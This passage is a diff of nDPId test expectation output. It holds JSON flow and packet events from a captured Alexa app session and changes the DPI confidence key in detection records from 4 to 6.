@@ -715,89 +715,89 @@ 00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2288,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":129,"flow_packet_id":3,"flow_last_seen":1490976139677,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1490976139677,"pkt":"AMDKkaPvePiC0\/vCCABFAAA0ziJAAEAGIi2sECrYNFQ\/OMsbAFAzpLr7UTv6AIAQAVfL2AAAAQEICgD2dN9s+ncB"} 00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2289,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":127,"flow_packet_id":3,"flow_last_seen":1490976139677,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1490976139677,"pkt":"AMDKkaPvePiC0\/vCCABFAAA02RpAAEAGFzWsECrYNFQ\/OMsZAFDfya3DUrie9YAQAVeDwwAAAQEICgD2dN9s+nm5"} 00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2290,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":130,"flow_packet_id":3,"flow_last_seen":1490976139678,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1490976139678,"pkt":"AMDKkaPvePiC0\/vCCABFAAA0c61AAEAGfKKsECrYNFQ\/OMscAFApFQd4fxQzdYAQAVcjzwAAAQEICgD2dN9s+nXP"} 
-01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2291,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":128,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976139643,"flow_last_seen":1490976139678,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":547,"flow_tot_l4_payload_len":547,"flow_avg_l4_payload_len":136,"midstream":0,"thread_ts_msec":1490976139678,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51994,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Amazon","breed":"Acceptable","category":"Web"},"http": {"hostname":"ecx.images-amazon.com","url":"ecx.images-amazon.com\/images\/I\/315y9IEXZSL._SL210_QL95_.png","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 5.1.1; LGLS751 Build\/LMY47V; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/56.0.2924.87 Mobile Safari\/537.36 PitanguiBridge\/1.16.4.5-[MANUFACTURER=LGE][RELEASE=5.1.1][BRAND=lge][SDK=22][MODEL=LGLS751]"}} -01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2292,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":129,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976139643,"flow_last_seen":1490976139678,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":547,"flow_tot_l4_payload_len":547,"flow_avg_l4_payload_len":136,"midstream":0,"thread_ts_msec":1490976139678,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51995,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Amazon","breed":"Acceptable","category":"Web"},"http": {"hostname":"ecx.images-amazon.com","url":"ecx.images-amazon.com\/images\/I\/5100jxqrQhL._SL210_QL95_.png","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 5.1.1; LGLS751 Build\/LMY47V; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 
Chrome\/56.0.2924.87 Mobile Safari\/537.36 PitanguiBridge\/1.16.4.5-[MANUFACTURER=LGE][RELEASE=5.1.1][BRAND=lge][SDK=22][MODEL=LGLS751]"}} -01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2293,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":127,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976139643,"flow_last_seen":1490976139678,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":547,"flow_tot_l4_payload_len":547,"flow_avg_l4_payload_len":136,"midstream":0,"thread_ts_msec":1490976139678,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51993,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Amazon","breed":"Acceptable","category":"Web"},"http": {"hostname":"ecx.images-amazon.com","url":"ecx.images-amazon.com\/images\/I\/61SZU-lPFNL._SL210_QL95_.png","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 5.1.1; LGLS751 Build\/LMY47V; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/56.0.2924.87 Mobile Safari\/537.36 PitanguiBridge\/1.16.4.5-[MANUFACTURER=LGE][RELEASE=5.1.1][BRAND=lge][SDK=22][MODEL=LGLS751]"}} -01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2294,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":130,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976139643,"flow_last_seen":1490976139678,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":547,"flow_tot_l4_payload_len":547,"flow_avg_l4_payload_len":136,"midstream":0,"thread_ts_msec":1490976139678,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51996,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Amazon","breed":"Acceptable","category":"Web"},"http": 
{"hostname":"ecx.images-amazon.com","url":"ecx.images-amazon.com\/images\/I\/81Ni5COup-L._SL210_QL95_.png","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 5.1.1; LGLS751 Build\/LMY47V; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/56.0.2924.87 Mobile Safari\/537.36 PitanguiBridge\/1.16.4.5-[MANUFACTURER=LGE][RELEASE=5.1.1][BRAND=lge][SDK=22][MODEL=LGLS751]"}} +01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2291,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":128,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976139643,"flow_last_seen":1490976139678,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":547,"flow_tot_l4_payload_len":547,"flow_avg_l4_payload_len":136,"midstream":0,"thread_ts_msec":1490976139678,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51994,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Amazon","breed":"Acceptable","category":"Web"},"http": {"hostname":"ecx.images-amazon.com","url":"ecx.images-amazon.com\/images\/I\/315y9IEXZSL._SL210_QL95_.png","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 5.1.1; LGLS751 Build\/LMY47V; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/56.0.2924.87 Mobile Safari\/537.36 PitanguiBridge\/1.16.4.5-[MANUFACTURER=LGE][RELEASE=5.1.1][BRAND=lge][SDK=22][MODEL=LGLS751]"}} 
+01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2292,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":129,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976139643,"flow_last_seen":1490976139678,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":547,"flow_tot_l4_payload_len":547,"flow_avg_l4_payload_len":136,"midstream":0,"thread_ts_msec":1490976139678,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51995,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Amazon","breed":"Acceptable","category":"Web"},"http": {"hostname":"ecx.images-amazon.com","url":"ecx.images-amazon.com\/images\/I\/5100jxqrQhL._SL210_QL95_.png","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 5.1.1; LGLS751 Build\/LMY47V; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/56.0.2924.87 Mobile Safari\/537.36 PitanguiBridge\/1.16.4.5-[MANUFACTURER=LGE][RELEASE=5.1.1][BRAND=lge][SDK=22][MODEL=LGLS751]"}} +01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2293,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":127,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976139643,"flow_last_seen":1490976139678,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":547,"flow_tot_l4_payload_len":547,"flow_avg_l4_payload_len":136,"midstream":0,"thread_ts_msec":1490976139678,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51993,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Amazon","breed":"Acceptable","category":"Web"},"http": {"hostname":"ecx.images-amazon.com","url":"ecx.images-amazon.com\/images\/I\/61SZU-lPFNL._SL210_QL95_.png","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 5.1.1; LGLS751 Build\/LMY47V; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 
Chrome\/56.0.2924.87 Mobile Safari\/537.36 PitanguiBridge\/1.16.4.5-[MANUFACTURER=LGE][RELEASE=5.1.1][BRAND=lge][SDK=22][MODEL=LGLS751]"}} +01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2294,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":130,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976139643,"flow_last_seen":1490976139678,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":547,"flow_tot_l4_payload_len":547,"flow_avg_l4_payload_len":136,"midstream":0,"thread_ts_msec":1490976139678,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51996,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Amazon","breed":"Acceptable","category":"Web"},"http": {"hostname":"ecx.images-amazon.com","url":"ecx.images-amazon.com\/images\/I\/81Ni5COup-L._SL210_QL95_.png","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 5.1.1; LGLS751 Build\/LMY47V; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/56.0.2924.87 Mobile Safari\/537.36 PitanguiBridge\/1.16.4.5-[MANUFACTURER=LGE][RELEASE=5.1.1][BRAND=lge][SDK=22][MODEL=LGLS751]"}} 00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2295,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":131,"flow_packet_id":2,"flow_last_seen":1490976139711,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976139711,"pkt":"ePiC0\/vCAMDKkVoBCABFAAA8AABAAPIGPkc0VD84rBAq2ABQyx1XQZuRlNdGa6AScSCQFAAAAgQFtAQCCAps+n\/1APZ03AEDAwg="} 
00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2296,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":131,"flow_packet_id":3,"flow_last_seen":1490976139713,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1490976139713,"pkt":"AMDKkaPvePiC0\/vCCABFAAA0MrdAAEAGvZisECrYNFQ\/OMsdAFCU10ZrV0GbkoAQAVcupAAAAQEICgD2dONs+n\/1"} -01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2297,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":131,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976139643,"flow_last_seen":1490976139714,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":547,"flow_tot_l4_payload_len":547,"flow_avg_l4_payload_len":136,"midstream":0,"thread_ts_msec":1490976139714,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51997,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Amazon","breed":"Acceptable","category":"Web"},"http": {"hostname":"ecx.images-amazon.com","url":"ecx.images-amazon.com\/images\/I\/61Tfp7ZVcoL._SL210_QL95_.png","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 5.1.1; LGLS751 Build\/LMY47V; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/56.0.2924.87 Mobile Safari\/537.36 PitanguiBridge\/1.16.4.5-[MANUFACTURER=LGE][RELEASE=5.1.1][BRAND=lge][SDK=22][MODEL=LGLS751]"}} 
+01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2297,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":131,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976139643,"flow_last_seen":1490976139714,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":547,"flow_tot_l4_payload_len":547,"flow_avg_l4_payload_len":136,"midstream":0,"thread_ts_msec":1490976139714,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51997,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Amazon","breed":"Acceptable","category":"Web"},"http": {"hostname":"ecx.images-amazon.com","url":"ecx.images-amazon.com\/images\/I\/61Tfp7ZVcoL._SL210_QL95_.png","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 5.1.1; LGLS751 Build\/LMY47V; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/56.0.2924.87 Mobile Safari\/537.36 PitanguiBridge\/1.16.4.5-[MANUFACTURER=LGE][RELEASE=5.1.1][BRAND=lge][SDK=22][MODEL=LGLS751]"}} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2480,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":132,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976142629,"flow_last_seen":1490976142629,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976142629,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.253","src_port":40878,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2480,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":132,"flow_packet_id":1,"flow_last_seen":1490976142629,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976142629,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8Si5AAEAGxLmsECrYNu8d\/Z+uAbuBOjwrAAAAAKAC\/\/9GYAAAAgQFtAQCCAoA9nYFAAAAAAEDAwg="} 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2481,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":132,"flow_packet_id":2,"flow_last_seen":1490976142691,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976142691,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAw0iJAAOcGldA27x39rBAq2AG7n66gUyr3gTo8LHASH\/4OHAAAAgQFtAEDAwY="} 00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2482,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":132,"flow_packet_id":3,"flow_last_seen":1490976142696,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976142696,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoSi9AAEAGxMysECrYNu8d\/Z+uAbuBOjwsoFMq+FAQAVdYjQAA"} 
-00863{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2483,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":132,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976142629,"flow_last_seen":1490976142698,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":243,"flow_tot_l4_payload_len":243,"flow_avg_l4_payload_len":60,"midstream":0,"thread_ts_msec":1490976142698,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.253","src_port":40878,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"skills-store.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -01026{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2484,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":132,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1490976142629,"flow_last_seen":1490976142816,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":243,"flow_tot_l4_payload_len":328,"flow_avg_l4_payload_len":65,"midstream":0,"thread_ts_msec":1490976142816,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.253","src_port":40878,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"skills-store.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} 
+00863{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2483,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":132,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976142629,"flow_last_seen":1490976142698,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":243,"flow_tot_l4_payload_len":243,"flow_avg_l4_payload_len":60,"midstream":0,"thread_ts_msec":1490976142698,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.253","src_port":40878,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"skills-store.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +01026{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2484,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":132,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1490976142629,"flow_last_seen":1490976142816,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":243,"flow_tot_l4_payload_len":328,"flow_avg_l4_payload_len":65,"midstream":0,"thread_ts_msec":1490976142816,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.253","src_port":40878,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"skills-store.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} 
00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2506,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":133,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976150029,"flow_last_seen":1490976150029,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976150029,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45750,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2506,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":133,"flow_packet_id":1,"flow_last_seen":1490976150029,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976150029,"pkt":"AMDKkaPvePiC0\/vCCABFAAA86ydAAEAGW8esECrYNF7ohrK2AbvOUJPOAAAAAKAC\/\/\/DwQAAAgQFtAQCCAoA9njpAAAAAAEDAwg="} 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2507,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":133,"flow_packet_id":2,"flow_last_seen":1490976150125,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976150125,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwoZ9AAOcG\/lo0XuiGrBAq2AG7sra0EJrCzlCTz3ASH\/4K2QAAAgQFtAEDAwY="} 
00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2508,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":133,"flow_packet_id":3,"flow_last_seen":1490976150126,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976150126,"pkt":"AMDKkaPvePiC0\/vCCABFAAAo6yhAAEAGW9qsECrYNF7ohrK2AbvOUJPPtBCaw1AQAVdVSgAA"} -00859{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2509,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":133,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976150029,"flow_last_seen":1490976150127,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976150127,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45750,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -01022{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2511,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":133,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976150029,"flow_last_seen":1490976150196,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1490976150196,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45750,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": 
{"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} -00640{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2517,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976022741,"flow_last_seen":1490976022741,"flow_idle_time":140000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":56,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1490976150210,"l3_proto":"ip6","src_ip":"::","dst_ip":"ff02::16","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} -00649{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2517,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976022731,"flow_last_seen":1490976022731,"flow_idle_time":140000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1490976150210,"l3_proto":"ip6","src_ip":"::","dst_ip":"ff02::1:ffd3:fbc2","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} 
-00655{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2517,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976027958,"flow_last_seen":1490976030758,"flow_idle_time":140000,"flow_min_l4_payload_len":60,"flow_max_l4_payload_len":60,"flow_tot_l4_payload_len":120,"flow_avg_l4_payload_len":60,"midstream":0,"thread_ts_msec":1490976150210,"l3_proto":"ip4","src_ip":"172.16.42.1","dst_ip":"172.16.42.216","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} -00664{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2517,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1490976023731,"flow_last_seen":1490976031750,"flow_idle_time":140000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1490976150210,"l3_proto":"ip6","src_ip":"fe80::7af8:82ff:fed3:fbc2","dst_ip":"ff02::2","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} +00859{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2509,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":133,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976150029,"flow_last_seen":1490976150127,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976150127,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45750,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": 
